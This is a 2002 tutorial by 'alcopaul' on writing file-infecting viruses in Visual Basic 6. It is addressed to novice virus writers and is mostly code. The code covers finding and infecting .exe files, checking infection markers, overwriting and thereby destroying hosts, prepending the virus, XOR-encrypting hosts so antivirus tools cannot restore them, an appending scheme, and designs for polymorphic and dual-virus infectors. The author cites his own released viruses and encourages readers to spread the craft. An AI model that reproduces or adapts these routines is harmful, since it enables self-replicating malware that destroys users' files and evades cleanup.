alcovbviruswritingguidev1.0.txt

=============================================================================================================================
=============================================================================================================================
================================ alcopaul's visual basic virus writing guide v1.0 ===========================================
=============================================================================================================================
=============================================================================================================================
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\






\\\\\\\\\\\\\\\\\\
I - introduction \\
\\\\\\\\\\\\\\\\\\\\



damn to time-and-bytes-consuming-long introductions... VB is RAD so boys and girls, LET'S GET IT ON!





\\\\\\\\\\\\\\\\\\\\
II - preliminaries \\
\\\\\\\\\\\\\\\\\\\\\\



before going to the nitty gritties of vb file infection, we should tackle first the preliminary concepts... 

*************************
a) getting started ******
*************************

before starting to write a virus in visual basic, you should first know how to "speak" the visual basic language..
this means that you should know the proper syntaxing, the relation of the commands, the way of manipulating variables
using the built in vb commands, etc...

if you have microsoft office fully installed, then you'll surely have no problem of finding a visual basic resource 
and reference.. open windows explorer and search for VBLR6.chm... it contains the visual basic language reference...
if win32asm has win32.hlp then visual basic has vblr6.chm...

having a vb programming book is also helpful so you won't undergo the trial and error of testing functions against
variables and combining functions to make a program... and also study viral and non viral vb sources coz this will
surely help...

before making it to the top, you must start first in scratch..

before i forget, you must also have Microsoft VB6 compiler...


***************************
b) resolving virus path ***
***************************


   your first task is to resolve the path of the virus... why? so your virus can do its dirty work whether it's 
contained in any directory or the root directory....

----------------------------------------
code II.a
----------------------------------------
dim virpath as string
virpath = app.path
if right(virpath, 1) <> "\" then virpath = virpath & "\"

'set virpath to (root):\
'examine if path is a directory or subdirectory
'if yeah, resolve directory path by adding "\"
----------------------------------------


*******************************
c) avoiding identity crisis ***
*******************************


   we'll treat exe, scr, com, pif files as the same... why? try renaming your notepad.exe to notepad.scr and execute it.
notepad window will appear... renaming notepad.exe to .com or .pif and executing it will have the same effect.
the notepad window will still appear...

   you must first establish the identity of your virus... if you want to target exe files, you should make your virus 
treat itself as a ".exe" file...

   when a virus that treats itself as an exe file infects a .scr file, executing the infected .scr won't pass the control
to the ".exe" virus... the virus assumes the file type of its host... so a ".exe" virus in a ".scr" host will treat 
itself as a ".scr"... so a ".exe" virus executed as a ".scr" will produce an error... in other words, your virus will have 
a problem with its identity...


----------------------------------------
code II.b
----------------------------------------
dim virbyte1 as string
dim virpath as string
virpath = app.path
if right(virpath, 1) <> "\" then virpath = virpath & "\"
Open virpath & App.EXEName & ".exe" For Binary Access Read As #2
virbyte1 = Space(number of bytes)
Get #2, , virbyte1
Close #2

'setting the virus identity
----------------------------------------


********************************************************************************************************
d) identifying if the file is infected then a choice of infecting all files at once or one at a time ***
********************************************************************************************************

   after establishing the identity of your virus, the next task is to do is to identify the target files... rule : virus
will infect file types of its kind... ".exe" virus infects ".exe" files.. ".com" virus infects ".com" files.... ".scr"
virus infects ".scr" files ... ".pif" virus infects ".pif" files...

   after the virus identifies the target files, check if the host is infected so it won't be infecting the same files
again and again... a virus must not infect an infected file... an real world example : if you're infected with AIDS, 
then you'll NOT be reinfected by AIDS...


---------------------------------------
code II.c.i
---------------------------------------
dim hlen as string
dim vsig as string
dim virpath as string
dim host as string
virpath = app.path
if right(virpath, 1) <> "\" then virpath = virpath & "\"
Open virpath & host For Binary Access Read As #1
hlen = (LOF(1))
vsig = Space(hlen)
Get #1, , vsig
Close #1
marker = Right(vsig, 9)
if marker = "signature" then
'search for more
else
'infect
---------------------------------------

why did i put 9 in marker = Right(vsig, 9)? coz the length of marker is 9... s-i-g-n-a-t-u-r-e = 9

if the host is infected then search for more...

if the host is clean, your next task is to infect it... you can make your virus infect all files
at once or infect one file per run... for now, we'll only concern on virus infecting files in its own directory...


----------------------------------------
code II.c.ii (infect all at once)
----------------------------------------
dim virpath as string
dim enumhosts as string
dim a as string
dim hosts, eachhost
dim hlen as string
dim vsig as string
dim marker as string
virpath = App.Path
If Right(virpath, 1) <> "\" Then virpath = virpath & "\"
enumhosts = Dir$(virpath & "*.exe") 
While enumhosts <> ""
a = a & enumhosts & "/"
enumhosts = Dir$
Wend
hosts = Split(a, "/")
For Each eachhost In hosts
Open virpath & eachhost For Binary Access Read As #1
hlen = (LOF(1))
vsig = Space(hlen)
Get #1, , vsig
Close #1
marker = Right(vsig, 9)
if marker = "signature" then
'---------------
GoTo notinfected
Else
GoTo infected
End If
notinfected:
'infect eachhost
infected:
Next eachhost
'---------------
-----------------------------------------

<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>

----------------------------------------
code II.c.iii (infect one file per run)
----------------------------------------
dim virpath as string
dim enumhosts as string
dim a as string
dim hosts, eachhost
dim hlen as string
dim vsig as string
dim marker as string
virpath = App.Path
If Right(virpath, 1) <> "\" Then virpath = virpath & "\"
enumhosts = Dir$(virpath & "*.exe") 
While enumhosts <> ""
a = a & enumhosts & "/"
enumhosts = Dir$
Wend
hosts = Split(a, "/")
For Each eachhost In hosts
Open virpath & eachhost For Binary Access Read As #1
hlen = (LOF(1))
vsig = Space(hlen)
Get #1, , vsig
Close #1
marker = Right(vsig, 9)
if marker = "signature" then
'----------------
GoTo notinfected
Else
GoTo infected
End If
notinfected:
'infect eachhost
Exit For '!!!
infected:
Next eachhost
'----------------
-----------------------------------------


variable enumhosts will enumerate all the ".exe" files in the current directory with the virus.... it will store the 
result in variable a... for example, the virus is in c:\ in which notepad.exe, calc.exe, explorer.exe etc are present... 
when virus runs, variable a will contain,


--------------------------------------------
a = notepad.exe/calc.exe/explorer.exe/... etc..
--------------------------------------------


then we'll create an array of filenames from variable a using split function

then for each filename in the array, examine if the file is infected or not....

*** this routine makes the virus infect all the target files

<<< code II.c.ii >>> 
'---------------
...
...
GoTo notinfected
Else
GoTo infected
End If
notinfected:
'infect eachhost
infected:
Next eachhost
'---------------


*** this routine infects one file per run...

<<< code II.c.iii >>>
'----------------
...
...
GoTo notinfected
Else
GoTo infected
End If
notinfected:
'infect eachhost
Exit For '!!! stop infecting others after infecting a file
infected:
Next eachhost
'----------------



****************************
e) regenerating the host ***
****************************


  the only way we can regenerate the host from a virus/host file is to save the host's bits and bytes into a file, and let 
the virus execute that file...

  i only saw two ways of executing the spawned host file from the infected file... i'm lazy to research for more so i just 
borrowed those routines from vb5 virus by murkry and lennon virus by the walrus...


--------------------------------------------
vb5 method
--------------------------------------------
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private iResult As Long
Private hProg As Long
Private idProg As Long
Private iExit As Long
Const STILL_ACTIVE As Long = &H103
Const PROCESS_ALL_ACCESS As Long = &H1F0FFF

'execute spawned host file

        idProg = Shell("c:\hostfile.ext", vbNormalFocus)
        hProg = OpenProcess(PROCESS_ALL_ACCESS, False, idProg)
        GetExitCodeProcess hProg, iExit
        Do While iExit = STILL_ACTIVE
            DoEvents
            GetExitCodeProcess hProg, iExit
        Loop
        Kill "c:\hostfile.ext"
----------------------------------------------

----------------------------------------------
lennon method
----------------------------------------------
Private Type STARTUPINFO
    cb As Long
    lpReserved As String
    lpDesktop As String
    lpTitle As String
    dwX As Long
    dwY As Long
    dwXSize As Long
    dwYSize As Long
    dwXCountChars As Long
    dwYCountChars As Long
    dwFillAttribute As Long
    dwFlags As Long
    wShowWindow As Integer
    cbReserved2 As Integer
    lpReserved2 As Long
    hStdInput As Long
    hStdOutput As Long
    hStdError As Long
End Type
Private Type PROCESS_INFORMATION
    hProcess As Long
    hThread As Long
    dwProcessID As Long
    dwThreadID As Long
End Type
Private Declare Function WaitForSingleObject Lib "kernel32" (ByVal hHandle As Long, ByVal dwMilliseconds As Long) As Long
Private Declare Function CreateProcessA Lib "kernel32" (ByVal _
    lpApplicationName As Long, ByVal lpCommandLine As String, ByVal _
    lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, _
    ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, _
    ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As Long, _
    lpStartupInfo As STARTUPINFO, lpProcessInformation As _
    PROCESS_INFORMATION) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private Const NORMAL_PRIORITY_CLASS = &H20&
Private Const INFINITE = -1&

Public Sub ExecCmd(cmdline$)
    Dim proc As PROCESS_INFORMATION
    Dim start As STARTUPINFO
    Dim ReturnValue As Integer
    start.cb = Len(start)
    ReturnValue = CreateProcessA(0&, cmdline$, 0&, 0&, 1&, NORMAL_PRIORITY_CLASS, 0&, 0&, start, proc)
    Do
    ReturnValue = WaitForSingleObject(proc.hProcess, 0)
    DoEvents
    Loop Until ReturnValue <> 258
    ReturnValue = CloseHandle(proc.hProcess)
End Sub

....
....

'execute the regenerated host
    CommandArgument = Command()
    ExecCmd "hostfile.ext" & " " & CommandArgument 
    Kill "hostfile.ext"

-------------------------------------------


we've seen two methods.... and with a little research you can make a new one...

if you're damn lazy like me, you must decide what to use from the previously laid routine... for now, we'll use the vb5 
method, much shorter than the lennon method... if you wish to use the lennon method, then do so.. 
both have the same effects anyways....


**************************
f)the exact virus bytes **
**************************

you need the virus size to be able to carry on viral infection in visual basic...

first put dummy size in the virus size constant.. then compile your source and use upx to compress the executable output...

get the byte size of the compressed output and it will be the constant virus size that you'll put to your virus
code...

the smaller the virus, the better.... and that goes to a respected virus coder who likes his viruses small, Super...

******************************
g) the variables *************
******************************

it is recommended to use option explicit and to define the variables that you'll use... your virus may not
work properly if you don't define the variables that your virus will be using...

i.e.

Dim virusbytes as string
Dim blah as long
etc.

some functions such as binary access read and binary access write require their variables to be explicitly defined...

don't forget this...







\\\\\\\\\\\\\\\\\\\\\
III - virology 101 \\\
\\\\\\\\\\\\\\\\\\\\\\\
   



so we're done on the preliminaries... we took up,

*** getting started
*** resolving virus path
*** establishing the identity of the virus
*** preventing reinfection and infecting all files per run or one file per run
*** executing the hosts
*** exact virus constant
*** defining the variables

    and there's more... we're on the meat of the article so brace yourselves, get your popcorn and read..


-------------------
overwriting viruses
-------------------


this is by far the easiest virus type to write.... an overwriting virus replaces its target files... it means that
the target file will have the same filesize, same bytes as the virus...

---------------                -----------------                         -----------------
  virus          ------------>       host          ------------------>        virus
---------------    targets     -----------------      host will become   -----------------


------------------------------
code III.a (overwrite)
------------------------------
'targets exe files
overwrite(virpath & eachhost)
function overwrite(host as string)
on error resume next
dim virbyte as string
dim sig as string
dim virpath as string
virpath = App.Path
If Right(virpath, 1) <> "\" Then virpath = virpath & "\"
filecopy virpath & app.exename & ".exe", host
end function
-------------------------------

assuming we have attached "signature" to the end of the original virus file with copy /b, then the reinfection of
infected files shouldn't work.. :)


-----------------------
overwriting viruses II
-----------------------

if virus size is greater than the host, then the infected host will assume the size of the virus...
if the host size is greater than the virus, then infected host will still hold the original host size....

-----------------                   ----------------                -------------------
  virus           --------------->     host           ------------>      virus
-----------------   targets                                         -------------------
                                                                         host
                                    ----------------                -------------------


------------------------------
code III.c (overwrite II)
------------------------------
'targets exe files
overwriteII(virpath & eachhost)
function overwriteII(host as string)
on error resume next
dim virbyte as string
dim sig as string
dim virpath as string
virpath = App.Path
If Right(virpath, 1) <> "\" Then virpath = virpath & "\"
Open virpath & App.EXEName & ".exe" For Binary Access Read As #2
virbyte = Space(5632) <--- for example, virus length is 12345
Get #2, , virbyte
Close #2
sig = "signature"
'insert signature to prevent reinfection
Open host For Binary Access Write As #3
Put #3, , virbyte
Put #3, , sig
Close #3
end function
-------------------------------

to check for the signature in this type of infection (since our signature file won't be contained at the end of the 
infected host file anymore), use the code below...

------------------------------------------------
Open virpath & host For Binary Access Read As #1
vsig = Space(5632 + 9) <----virus length + length of signature
Get #1, , vsig
'neglect the other bits and bytes
Close #1
marker = Right(vsig, 9)
if marker = "signature" then
'search for more
else
'infect
-------------------------------------------------


there's no way we can reconstruct the original host infected by an overwriting virus...

so vb boys and girls, overwriting viruses are dangerous coz they destroy..

---------------------------------------------------------
<<<<<<<<<<<<< prepending viruses >>>>>>>>>>>>>>>>>
---------------------------------------------------------

a prepending virus copies itself to the beginning of the host file and move the bits and bytes of the host file and
position it after the virus' bits and bytes.... two notable examples of this are the vb5 virus by murkry and
lennon virus by the walrus...

------------------                 ----------------------                    ------------------
  virus            -------------->        host              -------------->        virus
------------------                 ----------------------                    ------------------
                                                                                    host
                                                                             ------------------

------------------------------
code III.c (prepend)
------------------------------
'targets exe files
prepend(virpath & eachhost)
function prepend(host as string)
on error resume next
dim hostbyte as string
dim virbyte as string
dim sig as string
dim virpath as string
virpath = App.Path
If Right(virpath, 1) <> "\" Then virpath = virpath & "\"
Open host For Binary Access Read As #1
hostbyte = Space(LOF(1))
Get #1, , hostbyte
Close #1
Open virpath & App.EXEName & ".exe" For Binary Access Read As #2
virbyte = Space(5632) <-------- virus length ::: the virus constant from the compressed output, yo!
Get #2, , virbyte
Close #2
sig = "signature"
Open host For Binary Access Write As #3
Put #3, , virbyte
Put #3, , hostbyte
Put #3, , sig
Close #3
end function
-------------------------------

regenerating the host from infected files should be easy... 

*** a prepending virus reconstructuring its host ######

if virus, prepended to a host, is executed, it reads the
virus bytes and the hostbytes + signature, writes the hostbytes + signature to a file, executes the regenerated host file 
and deletes the regenerated file....

-------------------------------------
code III.c.i
-------------------------------------
using vb5 method
-------------------------------------
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private iResult As Long
Private hProg As Long
Private idProg As Long
Private iExit As Long
Const STILL_ACTIVE As Long = &H103
Const PROCESS_ALL_ACCESS As Long = &H1F0FFF

...
...
' executed in infected host
reghost(virpath & app.exename & ".exe")
Function reghost(goat As String)
On Error Resume Next
Dim hostbyte2 As String
Dim virbyte2 As String
Dim virpath As String
Dim dechost As String
virpath = App.Path
If Right(virpath, 1) <> "\" Then virpath = virpath & "\"
Open goat For Binary Access Read As #1
virbyte2 = Space(5632) <------ virus length
hostbyte2 = Space(LOF(1) - 5632) <-------- host length :)
Get #1, , virbyte2
Get #1, , hostbyte2
Close #1
' write the host bytes into a file
open virpath & "host.exe" For Binary Access Write As #2
Put #2, , hostbyte2
Close #2
idProg = Shell(virpath & "host.exe", vbNormalFocus)
hProg = OpenProcess(PROCESS_ALL_ACCESS, False, idProg)
GetExitCodeProcess hProg, iExit
Do While iExit = STILL_ACTIVE
DoEvents
GetExitCodeProcess hProg, iExit
Loop
Kill virpath & "host.exe"
End Function
-------------------------------------------

---------------------------------
prepending viruses with a twist
---------------------------------

the problem with prepending routine mentioned earlier is that avs can reconstruct the infected file... avs will just
remove the virus from its position and relocate the host file to the position previously occupied by the virus...
we want to give avs some headache, ayt? so we all agree... :)

what do we want to do with the host file? "ENCRYPT IT, ALCO!".. i heard you, hehehehe.. so we'll encrypt the host file
so "avs can do shit".. example of this is my virus VB.CHIMERA...

------------------                 ----------------------                    ------------------
  virus            -------------->        host              -------------->        virus
------------------                 ----------------------                    ------------------
                                                                                   enchost
                                                                             ------------------

how do we do it? here's a code snippet that encrypts strings..

Function x(sText As String)
On Error Resume Next
Dim ekey As Long, i As Long
Dim hash As String, crbyte As String
ekey = 1234 <------- any number
For i = 1 To Len(sText)
hash = Asc(Mid(sText, i, 1))
crbyte = Chr(hash Xor (ekey Mod 255))
x = x & crbyte
Next i
End Function

------------------------------
code III.d (prepend with encryption)
------------------------------
'targets exe files
prepend(virpath & eachhost)
function prepend(host as string)
on error resume next
dim hostbyte as string
dim virbyte as string
dim sig as string
dim virpath as string
dim enchost as string
virpath = App.Path
If Right(virpath, 1) <> "\" Then virpath = virpath & "\"
Open host For Binary Access Read As #1
hostbyte = Space(LOF(1))
Get #1, , hostbyte
Close #1
'encrypt host bytes
enchost = x(hostbyte)
Open virpath & App.EXEName & ".exe" For Binary Access Read As #2
virbyte = Space(5632) <-------- virus length ::: this can be any number
Get #2, , virbyte
Close #2
sig = "signature"
Open host For Binary Access Write As #3
Put #3, , virbyte
Put #3, , enchost
Put #3, , sig
Close #3
end function
.....
.....
' function x encrypts strings
Function x(sText As String)
On Error Resume Next
Dim ekey As Long, i As Long
Dim hash As String, crbyte As String
ekey = 1234
For i = 1 To Len(sText)
hash = Asc(Mid(sText, i, 1))
crbyte = Chr(hash Xor (ekey Mod 255))
x = x & crbyte
Next i
End Function
-------------------------------

so in an infected host file, the virus is in the beginning of the file and the host is encrypted in the end... to regenerate
the host, we can't do reading the encrypted host, putting the bytes into a file and executing it.... the original host won't 
execute coz the output file is not a valid w32 applix.. it's still encrypted... so the solution to our problem is to 
decrypt it....

assuming the virus is in it's encrypted host and we want to regenerate the host.... just pass the encrypted hostbytes
to the function x and it will decrypt the host on the fly...

-------------------------------------
code III.d.i
-------------------------------------
using vb5 method to reconstruct the host
-------------------------------------
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private iResult As Long
Private hProg As Long
Private idProg As Long
Private iExit As Long
Const STILL_ACTIVE As Long = &H103
Const PROCESS_ALL_ACCESS As Long = &H1F0FFF

...
...
' executed in infected host
reghost(virpath & app.exename & ".exe")
Function reghost(goat As String)
On Error Resume Next
Dim hostbyte2 As String
Dim virbyte2 As String
Dim virpath As String
Dim dechost As String
virpath = App.Path
If Right(virpath, 1) <> "\" Then virpath = virpath & "\"
Open goat For Binary Access Read As #1
virbyte2 = Space(5632) <------ virus length
hostbyte2 = Space(LOF(1) - 5632) <-------- host length :)
Get #1, , virbyte2
Get #1, , hostbyte2
Close #1
'decrypt encrypted host
dechost = x(hostbyte2)
open virpath & "host.exe" For Binary Access Write As #2
Put #2, , dechost
Close #2
idProg = Shell(virpath & "host.exe", vbNormalFocus)
hProg = OpenProcess(PROCESS_ALL_ACCESS, False, idProg)
GetExitCodeProcess hProg, iExit
Do While iExit = STILL_ACTIVE
DoEvents
GetExitCodeProcess hProg, iExit
Loop
Kill virpath & "host.exe"
End Function
.....
.....
' function x decrypts strings
Function x(sText As String)
On Error Resume Next
Dim ekey As Long, i As Long
Dim hash As String, crbyte As String
ekey = 1234
For i = 1 To Len(sText)
hash = Asc(Mid(sText, i, 1))
crbyte = Chr(hash Xor (ekey Mod 255))
x = x & crbyte
Next i
End Function
-----------------------------------

again, avs will have a difficult time reconstructing the host file.... expect them to say, "you should delete infected files
scanned as w32.blahblah virus..." nothing new... they always do that even if it's possible to reconstruct the host file....
avs are lazy....





\\\\\\\\\\\\\\\\\\\
IV - virology 102 \\
\\\\\\\\\\\\\\\\\\\\\




multicomponent vb virus in action!!! let's go, oi oi oi!

reminder : to merge the components, use copy /b in ms-dos prompt.. if you ain't familiar with the command, type copy/? 
then press enter, :)..

-----------------------
appending viruses
-----------------------

i haven't seen an appending vb virus.... but i devised a way to make one....

from my previous article "Some New Ideas For Your Next VB Executable File Infector",

"....

======================================
appending vb viruses (sandwich method)
======================================

dim VIR as VB6 virus
dim HOST as Host
dim HD as VB6 component/pseudo-header

illustration 2.a


=================			==================                         ======================
      HD   										    HD
=================								   ======================
     VIR           ------------------>         HOST          ------------------>            
											    HOST
=================			==================                         
										   ======================
                                   							    VIR
										
										   ======================



illustration 2.b



=================			==================                         ======================
      HD   										    HD
=================								   ======================
     HOST          ------------------>         HOST          ------------------>            
											    HOST
=================			==================                         
										   ======================
      VIR                             							    VIR
=================								   ======================

..."

when an infected host is executed, the header is first called.... what does the header do? the header reads itself first 
then the virus code appended to the host, then writes the virusbytes and headerbytes into a file in this manner,

----------------
   vir
----------------
   hd
----------------

executes the vir/hd file thus continuing infection, reads the host bytes, writes the hostbytes in a file and executes the 
host...

the intermediate virus file,

----------------
   vir
----------------
   hd
----------------

infects hosts in this manner.. 

it reads the vir bytes to a variable and the hd file in a variable, searches for a target
file, reads the hostbytes into a variable, prepends the header file to the host then copies the hostbytes to the host and
appends the virusbytes to the host....

here's a code snippet from my vb.sandwich virus

-------------------------
code IV.a (vir component)
-------------------------
....
....
Function virustime(hostpath As String)
On Error Resume Next
Dim ffile
Dim hostcode As String
Dim vir As String
Dim vircode As String
Dim header As String
vir = App.Path
If Right(vir, 1) <> "\" Then vir = vir & "\"
Open hostpath For Binary Access Read As #1
hostcode = Space(LOF(1))
Get #1, , hostcode
Close #1
' the intermediate virus file = vir/hd
Open vir & App.EXEName & ".exe" For Binary Access Read As #2
header = Space(LOF(2) - 5640) <------- header component (whole file minus virus bytes)
vircode = Space(5640) <---- virus code 
Get #2, , vircode
Get #2, , header
Close #2
Open hostpath For Binary Access Write As #3
Put #3, , header
Put #3, , hostcode
Put #3, , vircode
Close #3
End Function
------------------------

----------------------------
code IV.b (header component)
----------------------------
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private iResult As Long
Private hProg As Long
Private idProg As Long
Private iExit As Long
Const STILL_ACTIVE As Long = &H103
Const PROCESS_ALL_ACCESS As Long = &H1F0FFF
....
....
Dim vdir As String
Dim hdlen As String
Dim hostlen As String
Dim virlen As String
Dim buffhdlen As String
Dim buffhostlen As String
Dim buffvirlen As String
vdir = App.Path
If Right(vdir, 1) <> "\" Then vdir = vdir & "\"
Open vdir & App.EXEName & ".exe" For Binary Access Read As #1
hdlen = (5632)
hostlen = (LOF(1) - 11272)
virlen = (5640)
buffhdlen = Space(hdlen)
buffhostlen = Space(hostlen)
buffvirlen = Space(virlen)
Get #1, , buffhdlen
Get #1, , buffhostlen
Get #1, , buffvirlen
Close #1
'buff hostlen will contain the host bytes...
....
....
Open vdir & "XxX.exe" For Binary Access Write As #3
Put #3, , buffhostlen
Close #3
'borrowed from murkry's vb5 virus
idProg = Shell(vdir & "XxX.exe", vbNormalFocus)
hProg = OpenProcess(PROCESS_ALL_ACCESS, False, idProg)
GetExitCodeProcess hProg, iExit
Do While iExit = STILL_ACTIVE
DoEvents
GetExitCodeProcess hProg, iExit
Loop
Kill vdir & "XxX.exe"
---------------------------

so we have made an appending virus... i read symantec's desc of vb.sandwich and they said that the virus
prepends and appends itself to hosts...

we can make the header in win32asm thus optimizing the header and emulate a true appending virus... but i'm a visual
basic purist so i decided to make the header in vb eventhough the header size is nearly equal to the virus size....

it's still an appending virus coz the header is non-viral.... the virus is appended to the host file...



-------------------------
polymorphic viruses
-------------------------


we can't make a true polymorphic virus in vb... but we can make an improvised poly virus in vb...

this has been tested and proven to be possible via my vb viruses, vb.polly and vb.polly.b (encrypts hosts)

from my previous article "Some New Ideas For Your Next VB Executable File Infector",

"....

=======================================
polymorphic vb viruses (REALLY? YEAH!)
=======================================

dim VIR as VB6 virus
dim VIR1 as encrypted VB6 virus
dim VIR2 as another encrypted form VB6 virus
dim VIR(n) as another encrypted form VB6 virus
dim HOST as Host
dim ED as VB6 component/encryptor/decryptor



illustration 3.a


...

illustration 3.b


=================			==================                         ======================
      ED   										    ED
=================								   ======================
     HOST           ------------------>         HOST          ------------------>            
											    HOST
=================			==================                         
										   ======================
      VIR1                             							    VIR2
										
=================								   ======================



illustration 3.c



=================			==================                         ======================
      ED   										    ED
=================								   ======================
     HOST           ------------------>         HOST          ------------------>            
											    HOST
=================			==================                         
										   ======================
      VIR2                             							    VIR(n)
										
=================								   ======================


..."


so let's make a pseudo code of this kinda virus

------------------------
   pseudo-code I (encryptor/decryptor at the beginning)
------------------------

sub main()
read ED and put in variable AX
read HOST and put it in variable AY
read VIR and put in in variable AZ
read the key and put it in variable KEY
decrypt AZ encrypted vir using KEY
open virusfile for binary access write as #1
write decrypted VIR at the beginning
write ED at the end 
close
execute virusfile for infection
delete virusfile
write HOST in a new file
execute HOST
delete HOST
end sub
-------------------------

as you can see, this kinda virus produces an intermediate virus file,


----------------
   vir
----------------
   ed
----------------

and executes it to infect other files...

------------------------------
   pseudo-code II (intermediate virus)
------------------------------

sub main()
find new host
read Decrypted VIR and put it in AX
read ED and put it in AY
read HOST and put it in AZ
generate new KEY
encrypt AX with new KEY..
open HOST for binary access write
write AY (ED) in the beginning
write AZ (HOST) in the middle
write encrypted VIR
write the new key at the end 'this will be used by our ed(encryptor/decryptor) to generate the variably encrypted virus..
close
-------------------------------

if you'll imagine the infected files, the encrypted virus at the end possesses different forms in different files... 
thus polymorphism happened...

if you're wondering how to insert the signature mark to prevent reinfection, i hope this illustration should help...


intermediate virus produced by our poly vir infecting a host,

------------------------		  virus reads virus code,			  ----------------------------
   virus				  						  enc/dec with "alco" signature
------------------------   ------------>  reads target host, reads enc/dec ---------->    ----------------------------
 enc/dec with attached 			  with attached signature "alco"			   host
  "alco" at the end			  at the end, encrypts virus code with a new key  ----------------------------
------------------------		  and writes the read components    			 enc vir with new key
					  to the host, the encrypted vir code and key     ----------------------------
												  new key	
											  ----------------------------

----------------------
preventing reinfection
----------------------

sub main()
find host
check for signature
read the entire ed component+"alco" from the target host file
if right(entire ed component + "alco", 4) <> "alco" then
read virus code and put it in AX
read ed and put it in AY
read host and put it in AZ
generate new key
encrypt AX and with new key..
open host for binary access write
write AY ed in the beginning
write AZ host in the middle
write encrypted virus code
write the new key at the end 'this will be used by our ed(encryptor/decryptor) to generate the variably encrypted virus..
else
search for more
close
----------------------

you should attach the signature to the ed component using copy /b and treat the ed component length as ed component length
plus the signature length...



----------------------
two-in-one viruses
----------------------

yes, we can put two virus codes that "cooperate" in one host....

again, from my previous article "Some New Ideas For Your Next VB Executable File Infector",

"...

=========================================
the two-in-one vb virus (alternating hit)
=========================================


dim VIR as VB6 virus
dim VIR1 as another VB6 virus
dim HOST as Host

illustration 4.a

=================			==================                         ======================
      VIR   										   VIR1
=================								   ======================
   	           ------------------>         HOST          ------------------>            
      VIR1										   HOST
================= 		        ==================                         
										   ======================
	                             							   VIR
										
										   ======================

illustration 4.b


=================			==================                         ======================
      VIR1									          VIR
=================								   ======================
   	           ------------------>         HOST          ------------------>            
      HOST										  HOST
================= 			==================                         
										   ======================
      VIR                             							  VIR1
=================										
										   ======================
..."

a notable example of this is my file infector vb.yin-yang..

||||||||||||||||||
pseudo code \\\\\\
\\\\\\\\\\\\\\\\\\\

VIR in the beginning

sub main()
read VIR bytes to A
read Hostbytes to B
read VIR1 bytes to C
search for target
if not infected then
read target host bytes to D
prepend C to host
write D to host
append A to host
close host
else
search for more
'regenerate host
copy B to a file
execute file
delete file
end sub

VIR1 in the beginning

sub main()
read VIR1 bytes to A
read Hostbytes to B
read VIR bytes to C
search for target
if not infected then
read target host bytes to D
prepend C to host
write D to host
append A to host
close host
else
search for more
'regenerate host
copy B to a file
execute file
delete file
end sub

|||||||||||||||||||||||||||



\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
V - are you running out of ideas, alco? NOPE!\\\\\\\
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

so that's all for now.. can't afford to make this article long coz i'm running out of patience, tea and cigarettes.. 
so expect a v1.1 of this article in the near future...

i'm sure with the basic ideas, you can now code your first vb file infector... and with
the basic ideas, you'll able to produces new, kewl ideas and implement it to your future file infector... help
vb file infection grow by thinking of new things that we can implement on our future vb viruses......

bye for now, vb kids...





\\\\\\\\\\\\\
alcopaul\\\\\\
\\\\\\\\\\\\\\\
july 19, 2002\\\
\\\\\\\\\\\\\\\\\


\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
End of Text File\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\